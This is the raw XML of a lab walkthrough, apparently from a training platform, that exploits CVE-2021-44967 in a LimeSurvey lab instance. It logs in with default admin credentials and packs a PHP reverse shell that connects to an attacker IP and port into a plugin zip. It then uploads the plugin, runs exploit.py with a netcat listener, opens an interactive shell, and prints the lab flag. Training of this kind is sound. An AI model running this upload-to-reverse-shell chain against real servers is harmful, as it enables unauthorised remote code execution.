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44BE31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URL:</w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:tooltip="http://demo.ine.local" w:history="1">
        <w:r w:rsidRPr="00B7584E">
          <w:rPr>
            <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
            <w:color w:val="111827"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:eastAsia="en-IN"/>
          </w:rPr>
          <w:t> http://demo.ine.local</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6E4121D5" w14:textId="52C93170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7BA791B" wp14:editId="276A6A91">
            <wp:extent cx="5731510" cy="2724785"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1205110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E5E2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LimeSurvey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web application is hosted on the target server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6EF287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As noted on the project's</w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:tooltip="https://github.com/LimeSurvey/LimeSurvey" w:history="1">
        <w:r w:rsidRPr="00B7584E">
          <w:rPr>
            <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
            <w:color w:val="111827"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:eastAsia="en-IN"/>
          </w:rPr>
          <w:t> GitHub page</w:t>
        </w:r>
      </w:hyperlink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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5B26AB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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B7584E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C2C31"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Limesurvey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B7584E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C2C31"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the number one open-source survey software.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE75119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i/>
          <w:iCs/>
          <w:color w:val="2C2C31"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Advanced features like branching and multiple question types make it a valuable partner for survey-creation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011F2A4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Open the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/admin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page:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A521AF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URL:</w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:tooltip="http://demo.ine.local/admin" w:history="1">
        <w:r w:rsidRPr="00B7584E">
          <w:rPr>
            <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
            <w:color w:val="111827"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:eastAsia="en-IN"/>
          </w:rPr>
          <w:t> http://demo.ine.local/admin</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="110A0C26" w14:textId="6894D6FC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C4D2A2" wp14:editId="5DDDF770">
            <wp:extent cx="5731510" cy="2724785"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="16714470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B70D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lastRenderedPageBreak/>
        <w:t>You should get the login page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FB5A7B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Login using the provided credentials:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACB004A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Username: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admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D70E66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Password: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password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5007BE" w14:textId="4DD86158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4D151D1" wp14:editId="2DBA4461">
            <wp:extent cx="5731510" cy="2724785"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="13424084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CFB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We were successfully able to log in:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3DF167" w14:textId="77D1E078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D3C84E9" wp14:editId="187DD0A7">
            <wp:extent cx="5731510" cy="2724785"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="15573777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BB0E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Step 4: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Explore the plugins page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AF0299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Click on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Configuration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-&gt;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Plugins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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55035A62" w14:textId="32BAB239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5C3AB25" wp14:editId="005A04FB">
            <wp:extent cx="5731510" cy="2724785"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="14175905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4148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You should notice all the available plugins:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A687119" w14:textId="5A72A397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E8995BD" wp14:editId="46ECAA9C">
            <wp:extent cx="5731510" cy="2724785"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="8182623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B55B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Click on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Upload &amp; install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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8545C3" w14:textId="24C0C11B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F4251B3" wp14:editId="0EF0CCC7">
            <wp:extent cx="5731510" cy="2724785"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="4098983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44A6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You can upload a Zip plugin file through the provided web application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA062FB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Step 5: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Search for CVE-2021-44967.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73020661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Search Query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBBB738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LimeSurvey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CVE-2021-44967</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F709C1C" w14:textId="311BC330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E44F1ED" wp14:editId="611F75A3">
            <wp:extent cx="5731510" cy="2724785"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="14248060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1C3ED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Open the CVE Mitre link:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60662832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URL:</w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:tooltip="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44967" w:history="1">
        <w:r w:rsidRPr="00B7584E">
          <w:rPr>
            <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
            <w:color w:val="111827"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:eastAsia="en-IN"/>
          </w:rPr>
          <w:t> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44967</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4A2102D8" w14:textId="5119A56E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6021040" wp14:editId="52C816CC">
            <wp:extent cx="5731510" cy="2724785"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="8817992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FBE5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i/>
          <w:iCs/>
          <w:color w:val="2C2C31"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">A Remote Code Execution (RCE) vulnerability exists in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B7584E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C2C31"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>LimeSurvey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B7584E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C2C31"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5.2.4 via the upload and install </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B7584E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C2C31"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>plugins</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B7584E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="2C2C31"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> function, which could let a remote malicious user upload an arbitrary PHP code file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AA81D1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Open the following link mentioned in the references:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2243120F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URL:</w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:tooltip="https://github.com/Y1LD1R1M-1337/Limesurvey-RCE" w:history="1">
        <w:r w:rsidRPr="00B7584E">
          <w:rPr>
            <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
            <w:color w:val="111827"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:eastAsia="en-IN"/>
          </w:rPr>
          <w:t> https://github.com/Y1LD1R1M-1337/Limesurvey-RCE</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="021888D8" w14:textId="77235BFD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8364A89" wp14:editId="62903EDA">
            <wp:extent cx="5731510" cy="2724785"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="6640182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6D36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This project is available in the Kali GUI instance, in the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/root/Desktop/challenge-files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directory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D86092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Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FDBB78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ls -al /root/Desktop/challenge-files/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0DB526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lastRenderedPageBreak/>
        <w:t>ls -al /root/Desktop/challenge-files/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Limesurvey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-RCE/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEB4262" w14:textId="7FB96FB2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5D610BC" wp14:editId="292A9B30">
            <wp:extent cx="5731510" cy="2724785"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="8180238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595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Step 6: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Inspect and modify the provided exploit files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2895E068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List the contents of the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Y1LD1R1M.zip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file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CEB70C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Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5102DA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cd /root/Desktop/challenge-files/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Limesurvey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-RCE/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E7479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ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB1BF33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unzip -t </w:t>
      </w:r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Y1LD1R1M.zip</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4400D77A" w14:textId="53370A15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04CC129" wp14:editId="2F81FF44">
            <wp:extent cx="5731510" cy="2724785"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="18446619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35E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Check the contents of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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php-rev.php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file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBB4C1C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lastRenderedPageBreak/>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F63B7BF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cat </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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php-rev.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3F8CF1AE" w14:textId="4A55C324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B9AF299" wp14:editId="42F0EB5C">
            <wp:extent cx="5731510" cy="2724785"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="14010957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6B2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We </w:t>
      </w:r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have to</w:t>
      </w:r>
      <w:proofErr w:type="gram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change the lines highlighted in the above image; that is, we need to provide the IP and port of the attacker machine where the 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Netcat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listener would be running.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBB1020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Also, notice the shell command that gets executed on the target machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4666A9D7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Shell Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8E6DA7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uname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-a; w; id; /bin/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sh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-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i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5211839F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To place the IP address in the PHP reverse shell, we </w:t>
      </w:r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have to</w:t>
      </w:r>
      <w:proofErr w:type="gram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find the IP address of the attacker machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F35098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056784EE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ip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addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6F634A4B" w14:textId="23C739D2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259B3F8" wp14:editId="6C6D94C3">
            <wp:extent cx="5731510" cy="2724785"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="5546307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030D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The IP address of the attacker machine is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192.151.37.2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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004FE178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Place the IP address of the attacker machine (192.151.37.2) and the port (54321) in the PHP reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1389609C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184BF401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head </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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php-rev.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="34DC761B" w14:textId="3AC2F0EB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65A0983" wp14:editId="126FF744">
            <wp:extent cx="5731510" cy="2724785"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="6731811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A822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Find the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 xml:space="preserve">CHANGE </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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THIS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words</w:t>
      </w:r>
      <w:proofErr w:type="gram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in the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exploit.py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file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5DE07E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787A07D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grep -n -C3 'CHANGE THIS' exploit.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8B49D8" w14:textId="5D9D6599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72BA6F4" wp14:editId="1343285B">
            <wp:extent cx="5731510" cy="2724785"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="19609738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CF129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There are three potential places we </w:t>
      </w:r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have to</w:t>
      </w:r>
      <w:proofErr w:type="gram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make the change.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDC77F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Create the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Y1LD1R1M.zip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file again:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF29F1D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Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCEDC58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rm Y1LD1R1M.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE820BE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zip -r Y1LD1R1M.zip config.xml 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php-rev.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0D3CEDC5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unzip -t </w:t>
      </w:r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Y1LD1R1M.zip</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="757A62C0" w14:textId="1E1EAFD3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0B0B99A" wp14:editId="34CF642F">
            <wp:extent cx="5731510" cy="2724785"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="3486411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44D3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Now we have the payload plugin (zip file) with a PHP reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFC543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Step 7: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Upload the plugin zip file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34372AFB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lastRenderedPageBreak/>
        <w:t>Navigate to the web app and upload the plugin zip file (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Y1LD1R1M.zip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):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43789BBA" w14:textId="4059938E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CD366A" wp14:editId="559AF5AA">
            <wp:extent cx="5731510" cy="2724785"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1966856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AFF6C" w14:textId="4F97CC36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9AD68E2" wp14:editId="20681FDC">
            <wp:extent cx="5731510" cy="2724785"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="11073771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8556" w14:textId="5418A6F9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9D80EB" wp14:editId="0D0F5622">
            <wp:extent cx="5731510" cy="2724785"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="10827224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0970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lastRenderedPageBreak/>
        <w:t>Confirm the uploaded plugin:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6BD551" w14:textId="11EA77A3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67708A" wp14:editId="57BD1D06">
            <wp:extent cx="5731510" cy="2724785"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="13831831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3772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Click on the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Install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button:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445E7D70" w14:textId="2E11D8ED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554EAD" wp14:editId="0A86281A">
            <wp:extent cx="5731510" cy="2724785"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="11937204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F17F6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The malicious plugin containing the PHP reverse shell was successfully installed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10473640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To use this plugin, it </w:t>
      </w:r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has to</w:t>
      </w:r>
      <w:proofErr w:type="gram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be activated. That would be done by the exploit script provided in the challenge files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F8EEB9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Before proceeding with the exploitation, we need to find the plugin id. Locate the uploaded plugin:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EAEEE5" w14:textId="16F3C674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BB815F1" wp14:editId="69FF845F">
            <wp:extent cx="5731510" cy="2724785"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2309065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B02A" w14:textId="2CAC0DE4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02EA940" wp14:editId="05E2D484">
            <wp:extent cx="5731510" cy="2724785"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="9147896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277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Hover over the plugin's entry:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB07211" w14:textId="3DA40B56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91FC8E7" wp14:editId="73DD250A">
            <wp:extent cx="5731510" cy="2724785"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="88106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E9B6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Notice the link highlighted in the above image. It indicates the plugin id is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18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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E56EEEB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Now we have the path to the plugin zip file and the plugin id. Make those changes in the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exploit.py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file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2818745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4D3394E1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grep -n -C3 'CHANGE THIS' exploit.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE357D3" w14:textId="1600C4B3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36B18CA" wp14:editId="51E5B1A7">
            <wp:extent cx="5731510" cy="2724785"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="205293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1C90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Check the usage of the exploit script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462D6ACC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5766ED93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python3 exploit.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B50C9A" w14:textId="1E8B91C3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EA2D32D" wp14:editId="40FD5654">
            <wp:extent cx="5731510" cy="2724785"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="9252485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2E83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Start a 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Netcat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listener in another terminal window:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265224C5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3859507D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nc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-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lvp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54321</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5571AAB8" w14:textId="7EF9D9BE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8C3E5D" wp14:editId="5F8D0B74">
            <wp:extent cx="5731510" cy="2724785"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2283886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307C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Run the following command to exploit the target web app:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE3BE2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6F0254A6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python3 exploit.py http://demo.ine.local admin password 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477661E2" w14:textId="0792EF0F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A414789" wp14:editId="57291EBD">
            <wp:extent cx="5731510" cy="2724785"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="10740758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056D" w14:textId="651AE115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5620CC3" wp14:editId="7AF9AB2F">
            <wp:extent cx="5731510" cy="2724785"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="20984349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AF6C5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Exploitation was successful. Check the terminal where the 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Netcat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listener was running:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B9CB0B" w14:textId="0FB070FB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D90854F" wp14:editId="6A37D52A">
            <wp:extent cx="5731510" cy="2724785"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="6633213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38EB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We have received a shell session from the target server. The output of the following commands is shown in the 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Netcat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window:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642753A1" w14:textId="77777777" w:rsidR="00B7584E" w:rsidRPr="00B7584E" w:rsidRDefault="00B7584E" w:rsidP="00B7584E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
          <w:left w:val="single" w:sz="2" w:space="21" w:color="auto"/>
          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
          <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E9E9ED"/>
        <w:spacing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uname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-a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C03389" w14:textId="77777777" w:rsidR="00B7584E" w:rsidRPr="00B7584E" w:rsidRDefault="00B7584E" w:rsidP="00B7584E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
          <w:left w:val="single" w:sz="2" w:space="21" w:color="auto"/>
          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
          <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E9E9ED"/>
        <w:spacing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w</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F85E5C4" w14:textId="77777777" w:rsidR="00B7584E" w:rsidRPr="00B7584E" w:rsidRDefault="00B7584E" w:rsidP="00B7584E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
          <w:left w:val="single" w:sz="2" w:space="21" w:color="auto"/>
          <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
          <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="E9E9ED"/>
        <w:spacing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id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECC3F43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Step 8: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Retrieve the flag from the target server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA3A384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Now that we have the shell session on the target server, we can execute OS commands on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC4BEF1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Listing the files present in the current working directory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DE0209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0A00EEFC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ls -al</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DCF99C" w14:textId="389E9E8A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C56F3D4" wp14:editId="2300A147">
            <wp:extent cx="5731510" cy="2724785"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="91676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0BB21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Locating the flag file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F79237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21B12EC9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find / -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iname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 *flag* 2&gt;/dev/</w:t>
      </w:r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null</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="255C9097" w14:textId="26AE5260" w:rsidR="00B7584E" w:rsidRPr="00B7584E" w:rsidRDefault="00B7584E" w:rsidP="00B758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ED4D479" wp14:editId="73DA912F">
            <wp:extent cx="5731510" cy="2724785"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="4567129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B3D7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The flag is present in the </w:t>
      </w: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/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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/FLAG.txt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file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B727C8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Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347DF40E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 xml:space="preserve">cat </w:t>
      </w:r>
      <w:proofErr w:type="gram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/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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/FLAG.txt</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5F08931A" w14:textId="77777777" w:rsidR="00B7584E" w:rsidRPr="00B7584E" w:rsidRDefault="00B7584E" w:rsidP="00B7584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E9E9ED"/>
        <w:spacing w:before="300" w:after="300" w:line="240" w:lineRule="auto"/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</w:pPr>
      <w:r w:rsidRPr="00B7584E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="111827"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>FLAG:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B7584E">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="2C2C31"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t> 5cd43944938b4766026a8a77c08a28a7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5082451F" w14:textId="3F2CFDAA" w:rsidR="0066500B" w:rsidRDefault="00B7584E" w:rsidP="00B7584E">
      <w:r w:rsidRPr="00B758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5E7F23C" wp14:editId="61F0F457">
            <wp:extent cx="5731510" cy="2724785"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="157296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500B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32EF7D" w14:textId="77777777" w:rsidR="00AD62EB" w:rsidRDefault="00AD62EB" w:rsidP="00B7584E">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
